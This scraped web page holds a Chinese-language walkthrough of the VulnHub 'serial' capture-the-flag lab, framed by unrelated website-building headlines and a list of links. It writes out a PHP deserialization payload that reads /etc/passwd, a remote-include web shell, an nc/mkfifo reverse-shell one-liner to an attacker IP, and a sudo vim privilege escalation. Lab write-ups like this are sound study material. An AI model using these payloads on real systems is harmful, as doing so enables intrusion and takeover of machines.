当前位置: 首页 > news >正文

外贸网站建站那家公司好网站建设项目需求说明书

外贸网站建站那家公司好,网站建设项目需求说明书,如何在阿里巴巴上做网站,做网站需要视频衔接怎么一.安装靶机 下载地址为https://download.vulnhub.com/serial/serial.zip#xff0c;安装好后开启靶机#xff0c;这里并不需要我们去登录#xff0c;直接扫描虚拟机nat模式下c网段的ip#xff0c;看看哪个的80端口开放#xff0c;然后直接去访问 二.查找cookie 访问靶…一.安装靶机 下载地址为https://download.vulnhub.com/serial/serial.zip安装好后开启靶机这里并不需要我们去登录直接扫描虚拟机nat模式下c网段的ip看看哪个的80端口开放然后直接去访问 二.查找cookie 访问靶机ip后来到这样一个页面按下f12检查打开网络监视器 重新刷新一次页面后会出现两个流量一个访问为200一个为404我们点击200的流量然后查看右边的消息头可以在cookie中找到一串编码 我们将其解码后发现内容为 O:4:User:2:{s:10:Username;s:3:sk4;s:9:Userwel;O:7:Welcome:0:{}}这是一串字符序列其中O代表的是object-项目4则是项目名称字符数量而项目名称则是User2代表项目数量10为第一个项目的字符长度s为类型-string以此类推我们先将其保存起来 三.查询目录 我们利用kali去爆破靶机网站的目录这里可以看到有一个backup目录可以访问 访问后看到一个bak.zip的压缩文件点击可以将其下载 四.代码审计 下载解压得到三个文件里面放着网站的源代码这里就需要代码审计了在index.php中我们可以看到user.class.php它包含了user.class.php文件的代码然后将cookie中的user的值进行base64编码 而user.name.php文件中包含了log.class.php还定义了welcome与user两个类而_construct()与_destruct()两个是序列化中的魔术函数且有参数name所以这里有反序列化漏洞 user.name.php文件还调用了log.class.php文件中的handler函数log.class.php文件中则是定义了一个Log类同时也有costruct函数且handler函数对变量还进行了文件包含和输出 经过代码审计后就可以构造出pyload如下将其放到任意一个php文件中然后访问即可得到序列化经过base64编码后的内容 ?phpclass Log {private $type_log /etc/passwd;}class User {private $name admin;private $wel;function __construct() {$this-wel new Log();} } $obj new User(); echo base64_encode(serialize($obj));O:4:User:2:{s:10:Username;s:5:admin;s:9:Userwel;O:3:Log:1:{s:13:Logtype_log;s:11:/etc/passwd;}} //序列化Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ //base64编码 五.抓包 我们在靶机网站首页开启抓包然后刷新网页获取到数据包将其发送到重放器后用我们构造的经过序列化和base64编码后的pyload去替换user后的内容然后发送即可得到passwd文件内容 六.获取shell 接下来我们就要获取shell我们可以利用上面的pyload上传一个一句话木马然后去连接。首先我们在自己的web根目录下新建一个3.txt文件内容为?php system($_GET[cmd]);?然后再次构造pyload其中ip为本机ip ?phpclass Log {public $type_log http://192.168.3.133/3.txt; } class User {public $name;public $wel; function __construct($name) {$this-name $name;$this-wel new Log(); } } $us new User(sk4); print_r(serialize($us)); ? 将其序列化后进行base64编码 O:4:User:2:{s:4:name;s:3:sk4;s:3:wel;O:3:Log:1:{s:8:type_log;s:26:http://192.168.3.133/3.txt;}}Tzo0OiJVc2VyIjoyOntzOjQ6Im5hbWUiO3M6Mzoic2s0IjtzOjM6IndlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjY6Imh0dHA6Ly8xOTIuMTY4LjMuMTMzLzMudHh0Ijt9fQ 然后再次用其替换url后面内容发送即可成功获取shell可以直接添加参数查数据 七.反弹shell 接下来就要反弹shell将参数替换为如下语句其中ip为开启监听的虚拟机可以用虚拟机只要能连接到靶机就行7777则是监听的端口 rm/tmp/f%3bmkfifo/tmp/f%3bcat/tmp/f|/bin/sh-i2%261|nc192.168.154.1287777/tmp/f 发送后即可反弹到shell 其中credentials.txt.bak为敏感文件cat其后即可看到sk4用户的密码得到密码后就可以连接靶机的22端口了 八.提权 首先我们输入sudo -l查看当前用户无法执行的命令发现vim所有用户都可使用那么我们直接输入sudo vim进入编辑模式输入bash即可提权
http://www.dnsts.com.cn/news/149889.html

相关文章:

  • 收录好的网站有哪些保山做网站
  • 化工网站制作网站建设资源平台
  • 专题网站开发报价怎么做一直弹窗口网站
  • 网站首次备案 多久手机怎么登录微信网页版
  • 网站引入优酷视频旅游网站规划设计与建设
  • 网站模板 作业谷歌系平台推广
  • 搜索引擎网站优化推广浙江均泰建设有限公司网站
  • 网站开发项目时序图商标logo设计生成器免费
  • 天价索赔背后的平台版权对垒慈溪企业网站seo
  • 合肥网站建设王道下拉??线下推广有哪些渠道
  • 个性化网站有哪些新钥匙石家庄网站建设
  • 哪里网站海报做的比较好桂林建设信息网站
  • 百度站长工具登录方式网站搜索排名和什么有关系
  • 网站规划与建设wordpress 主题 排名
  • 如何做网站界面linode vps wordpress
  • 如何做pc网站适配胶南网络推广
  • 机关门户网站 建设 方案wordpress的固定链接怎么设置
  • 做学徒哪个网站好贵阳开发网站建设
  • 智能家居网站建设可行性分析报告常见的门户网站有哪些
  • 网站建设 网络科技公司网站备案幕布大小
  • 微信微网站建设门户制作
  • 网站建设中关村网站建设规划书 百度文库
  • 合肥国际网站建设正规平台博兴做网站
  • 网站建设常州麦策电商开发公司安全管理组织机构图
  • 免费网站建设招商做网站服务器可以挂到外地么
  • 学校门户网站建设方案企业如何做网站推广
  • 途牛旅游网站建设目的如何创建电子商务网站
  • 网络推广建立站点如何建立网站怎么创建内容
  • 怎么挖掘网站的关键词网站seo专员招聘
  • 建设部证书查询网站学校校园网站建设实践选题背景